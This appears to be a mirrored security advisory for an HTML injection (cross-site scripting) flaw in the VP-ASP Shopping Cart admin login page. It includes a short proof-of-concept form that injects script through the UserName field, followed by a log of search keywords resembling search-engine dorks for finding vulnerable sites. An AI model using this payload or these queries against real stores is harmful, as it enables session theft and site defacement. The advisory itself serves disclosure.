VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability
TITLE: VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability
CLASS: Input Validation Error
CVE: CAN-2005-3685
REMOTE: Yes
LOCAL: No
PUBLISHED: Nov 17 2005 12:00AM
UPDATE: Nov 17 2005 12:00AM
CREDIT: ConcorDHacK is credited with the discovery of this vulnerability.
VULNERABLE:
VP-ASP Shopping Cart
NOT VULNERABLE:
Vai alla pagina originale su Security Focus
Discussion
VP-ASP Shopping Cart is prone to an HTML injection vulnerability. This is due to a lack of proper validation of user-supplied input before being used in dynamically generated content.
Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
Exploit
No exploit is required.
Proof of concept code has been provided:
<TITLE>VP-ASP Shopping UserName HTML Injection Vulnerability</TITLE>
<form action=http://www.example.com/shopadmin.asp name=LoginForm method=POST>
<input type=hidden name=UserName value='"><script>alert("Vulnerable server!!!
By ConcorDHacK")</script>
<b><font color="red" size="10">Vulnerable server<br>By ConcorDHacK@gmail.com>
</font> </b>' /> <input type=hidden name=Password size="20" value="123"></td>
<input type=submit name="Login" value="GO ! GO !"><br><br><br>By ConcorDHacK<br>
<u>Email</u>: ConcorDHacK@gmail.com<br>
<a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a>
</form>
</body>
</HTML>
Solution
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.
References
References:
Keywords for this page:
/shopadmin asp (from google) first seen: 2007-06-27 19:39:22 hit: 3
mss (from yahoo) first seen: 2007-02-26 10:50:49
shopadmin asp injection (from google) first seen: 2007-06-23 13:27:38
UK (from yahoo) first seen: 2007-04-19 12:01:44
/shopadmin asp (from yahoo) first seen: 2007-05-04 02:36:08
shopadmin asp (from google) first seen: 2007-07-09 03:12:25 hit: 42
shopadmin exploit (from google) first seen: 2007-09-02 22:20:21 hit: 11
concordhack (from google) first seen: 2007-09-11 18:33:33 hit: 3
vulnerability shopadmin (from google) first seen: 2007-09-11 19:58:06
vuln: vp-asp shopping cart shopadmin asp html (from google) first seen: 2007-10-21 13:58:53
injection for shopadmin (from google) first seen: 2007-11-05 00:43:00
vuln shopadmin asp (from google) first seen: 2007-11-09 17:51:41
vp-asp shopping cart shopadmin exploit (from google) first seen: 2007-11-23 15:15:07
shopadmin asp exploit (from google) first seen: 2008-02-11 02:37:38
shopadmin vp asp exploit (from google) first seen: 2008-02-21 16:18:59
shopadmin asp exploits (from google) first seen: 2008-02-22 15:19:24
inurl%3ashopadmin asp (from lycos) first seen: 2008-03-09 21:33:11
http://www google it/ (from google) first seen: 2008-03-16 00:11:54
com/shopadmin (from google) first seen: 2008-03-22 18:31:43 hit: 2
inurl: shopadmin asp (from google) first seen: 2008-03-25 23:20:31
shopping from web inurl: shopadmin asp (from google) first seen: 2008-03-30 00:25:17
inurl :shopadmin asp (from google) first seen: 2008-04-06 21:32:11
shopadmin injection 2008 (from google) first seen: 2008-04-09 02:34:45
vp-asp shopadmin asp (from google) first seen: 2008-04-10 12:57:43
intitle:/shopadmin asp (from google) first seen: 2008-04-13 03:26:41
shopadmin asp html injection (from google) first seen: 2008-04-16 15:46:55
t (from google) first seen: 2008-04-18 10:45:58
vp-asp exploit (from google) first seen: 2008-04-19 00:51:00 hit: 2
f (from google) first seen: 2008-04-20 17:33:35 hit: 3
exploit of shopadmin (from google) first seen: 2008-04-21 08:53:09
shopadmin (from google) first seen: 2008-04-25 05:26:57
exploit shopadmin (from google) first seen: 2008-04-27 09:49:11
shopadmin exploits (from google) first seen: 2008-04-27 22:11:37
allintitle:shopadmin asp (from google) first seen: 2008-04-28 04:38:24
shopadmin exploit (from yahoo) first seen: 2008-11-21 12:17:31
GoogleBot visited this page on: 2008-09-27 07:00:42